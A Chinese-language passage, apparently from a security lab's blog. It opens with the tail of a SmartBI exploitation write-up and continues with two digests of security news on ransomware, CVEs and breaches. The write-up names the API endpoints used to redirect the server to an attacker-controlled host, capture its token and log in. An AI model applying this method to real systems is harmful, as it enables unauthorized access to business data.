那意味着，只需要调用/smartbix/api/monitor/setServiceAddress接口，将ENGINE_ADDRESS设置为我们可控的伪造服务器，那么就可以从请求报文中获取到token。（这个位置经过尝试，发现伪造服务器上需要实现使用POST方法请求的/api/v1/configs/engine/smartbitoken接口，并且，响应内容为json)获取完token后，就可调用/smartbix/api/monitor/login方法进行登录 0x03其他说明 上述只说明了设置ENGINE_ADDRESS利用的情况，设置SERVICE_ADDRESS进行利用的步骤也和上述类似

1、研究人员披露CypherRAT和CraxsRAT恶意软件开发者身份 https://www.cyfirma.com/outofband/unmasking-evlf-dev-the-creator-of-cypherrat-and-craxsrat/ 研究人员揭露了 CypherRAT 和 CraxsRAT 远程访问木马 (RAT) 背后开发人员的真实身份。过去八年中，此人使用“ EVLF DEV ”的在线账号在叙利亚境外开展业务，据信通过向各种威胁行为者出售这两种 RAT 赚取了超过 75,000 美元。此人也是恶意软件即服务 (MaaS) 运营商。在过去的三年里，EVLF 一直在 Surface 网络商店上提供 CraxsRAT，这是目前最危险的 And 2、TP-Link智能灯泡存在漏洞可导致WiFi密码泄露 https://arxiv.org/pdf/2308.09019.pdf 研究人员在 TP-Link Tapo L530E 智能灯泡和 TP-Link Tapo 应用程序中发现了四个漏洞，攻击者可以利用这些漏洞窃取目标的 WiFi 密码。TP-Link Tapo L530E 是包括亚马逊在内的多个市场上最畅销的智能灯泡。TP-link Tapo是一款智能设备管理应用程序，在Google Play上拥有1000万安装量 。最令人担忧的攻击场景是利用漏洞进行灯泡冒充和检索 Tapo 用户帐户详细信息。然后，通过访问 Tapo 应用程序，攻击者可以提取受害者的 WiFi SSID 和密码，并获得连 3、Ivanti警告MobileIron零日漏洞可导致身份验证绕过 https://forums.ivanti.com/s/article/CVE-2023-38035-API-Authentication-Bypass-on-Sentry-Administrator-Interface?language=en_US 美国 IT 软件公司 Ivanti 警告客户一个关键的 Sentry API 身份验证绕过漏洞正在被利用。Ivanti Sentry（以前称为 MobileIron Sentry）中发现了一个漏洞。此漏洞影响 9.18 及更早版本。该漏洞不会影响其他 Ivanti 产品，例如 Ivanti EPMM 或 Ivanti Neurons for M 4、Akira 勒索团伙以 Cisco VPN 产品为目标来攻击组织 https://securityaffairs.com/149770/malware/akira-ransomware-cisco-vpn.html Akira 勒索软件团伙以 Cisco VPN 产品为目标，以获得对企业网络的初始访问权限并窃取其数据。Akira勒索软件自 2023 年 3 月以来一直活跃，该恶意软件背后的威胁行为者声称已经入侵了多个行业的多个组织，包括教育、金融和房地产。 5、美国政府和国防承包商 Belcan 泄露了超级管理员凭据和敏感数据 https://securityaffairs.com/149779/data-breach/belcan-leaks-admin-password.html Cybernews 研究团队透露，美国政府和国防承包商 Belcan 泄露了其超级管理员凭据。 6、Snatch 勒索软件团伙攻击了南非国防部并窃取了1.6TB数据 https://securityaffairs.com/149760/cyber-crime/snatch-ransomware-department-of-defence-south-africa.html 该团伙声称窃取了军事合同、内部呼号和个人数据，总计 1.6 TB 数据。 7、CISA 警告称，一个Adobe ColdFusion 漏洞被广泛利用 https://www.securityweek.com/cisa-warns-of-another-exploited-adobe-coldfusion-vulnerability/ 美国网络安全和基础设施安全局 (CISA) 警告各组织，今年早些时候修补的 Adobe ColdFusion 漏洞正被利用进行攻击。 该漏洞被追踪为 CVE-2023-26359，CISA 于周一将其添加到其已知可利用漏洞 (KEV) 目录中。 8、MOVEit 攻击狂潮使 Clop 成为今夏最多产的勒索软件 https://www.cybersecuritydive.com/news/clop-one-third-ransomware-attacks/691433/ 根据多份威胁情报报告，7 月份所有勒索软件攻击中有三分之一是由 Clop 发起的，这使得这个出于经济动机的威胁行为者成为今年夏天最多产的勒索软件威胁行为者。 9、Duo持续中断导致Azure Auth身份验证错误 https://status.duo.com/incidents/rw7g0q7ztj8f 思科旗下的多重身份验证 (MFA) 提供商 Duo Security 正在调查持续中断事件，该中断导致身份验证失败和错误。这次中断还导致多个 Duo 服务器出现核心身份验证服务问题，从而在系统范围内的中断中触发 Azure 条件访问集成的 Azure Auth 身份验证错误。虽然 Azure 身份验证问题已自动解决，但客户仍然报告遇到问题，包括登录时身份验证速度缓慢和失败。 10、不法分子向儿童借手表“打电话”，盗走 SIM 卡用于境外电诈 https://www.ithome.com/0/713/676.htm 诈骗分子在借到了孩子的儿童电话手表后，会偷偷将手表内部的 SIM 卡盗走，再将电话卡插入虚拟拨号设备，与境外诈骗团伙勾结，随后海量拨打诈骗电话。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、研究人员演示欺骗苹果设备并诱骗用户共享敏感数据 https://securityaffairs.com/149711/hacking/spoofing-apple-device.html 在最近的 Def Con 黑客大会上，白帽黑客演示了如何欺骗 Apple 设备并诱骗用户共享敏感数据。使用 iPhone 参加会议的与会者开始看到弹出消息， 提示他们连接 Apple ID 或与附近的 Apple TV 共享密码。安全研究人员表示此行为为了提醒人们“真正关闭”蓝牙（即不是从控制中心关闭），并表示没有收集任何数据，他只是发送不需要配对的蓝牙低功耗 (BLE) 广告数据包。 2、研究人员发现人工智能在攻击行为中使用有限 https://www.mandiant.com/resources/blog/threat-actors-generative-ai-limited 研究人员一直跟踪攻击者对 AI 功能的使用情况以及恶意活动情况。根据研究人员观察得出人工智能在入侵操作中的采用仍然有限，并且主要与社会工程有关。具有不同动机和能力的信息行动参与者在其活动中越来越多地利用人工智能生成的内容，特别是图像和视频，这可能至少部分归因于此类捏造的虚假信息显而易见的应用。预计未来生成式人工智能工具将加速攻击者将人工智能融入信息操作和入侵活动中。 3、CISA遭遇勒索软件攻击后发布远程监控工具计划 https://therecord.media/cisa-jcdc-remote-monitoring-management-plan 美国网络安全防御机构和私营公司之间联合发布了第一个利用远程监控和管理（RMM）工具解决安全问题的计划。RMM 软件通常被全球大多数大型组织的 IT 部门用作远程访问计算机的方式，以帮助安装软件或员工所需的其他服务。近年来，黑客越来越多地利用这些工具（尤其是在政府网络中）作为绕过安全系统并建立对受害者网络的长期访问的简单方法。今年 1 月，美国网络安全和基础设施局 (CISA) 和国家安全局表示，至少两个联邦民事机构通过使用 RMM 软件实施的退款诈骗活动的一 4、BlackCat 勒索软件组织声称攻击了Seiko https://securityaffairs.com/149734/cyber-crime/blackcat-alphv-ransomware-group-seiko.html BlackCat/ALPHV 勒索软件组织声称对日本手表制造商 Seiko 进行了黑客攻击，并将该公司添加到其数据泄露网站中。 5、Tesla 披露数据泄露影响 75,000 人的个人信息 https://www.securityweek.com/tesla-discloses-data-breach-related-to-whistleblower-leak/ 特斯拉披露了一起影响约 75,000 人的数据泄露事件，但该事件是前员工泄密的结果，而不是恶意网络攻击的结果。 6、国际刑警组织逮捕 14 名涉嫌盗窃 4000 万美元的网络罪犯 https://www.freebuf.com/news/375521.html Bleeping Computer 网站披露，4 月份，国际刑警组织发动了一起为期四个月，横跨 25 个非洲国家的执法行动 “Africa Cyber Surge II”，共逮捕 14 名网络犯罪嫌疑人，摧毁 20000 多个从事勒索、网络钓鱼、BEC 和在线诈骗的犯罪网络。 7、APT29针对北约结盟国家的外交部 https://securityaffairs.com/149620/apt/apt29-used-zulip-chat-app.html 与俄罗斯有关的APT29使用Zulip聊天应用程序针对北约结盟国家外交部的攻击。 8、来自美国教育部的数据在暗网出售 https://thecyberexpress.com/us-department-of-education-data-dark-web/ 暗网上的卖家声称拥有美国教育部的用户名、消费者 ID、代币等。据称美国教育部在暗网上出售数据的真实性无法得到证实。 9、DefCon大会演示黑掉卫星：首次成功移动轨道、劫持摄像头拍照 https://www.secrss.com/articles/57929 今年DEF CON黑客大会在航空航天村举办Hack-A-Sat（黑掉卫星）比赛。该比赛由美国空军发起首个在轨卫星黑客挑战赛。 10、新的苹果iOS 16漏洞在假飞行模式下实现隐形蜂窝访问 https://thehackernews.com/2023/08/new-apple-ios-16-exploit-enables.html 网络安全研究人员在iOS 16上记录了一种新颖的漏洞利用后持久性技术，该技术可能被滥用在飞行模式下并保持对Apple设备的访问，即使受害者认为它处于离线状态。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。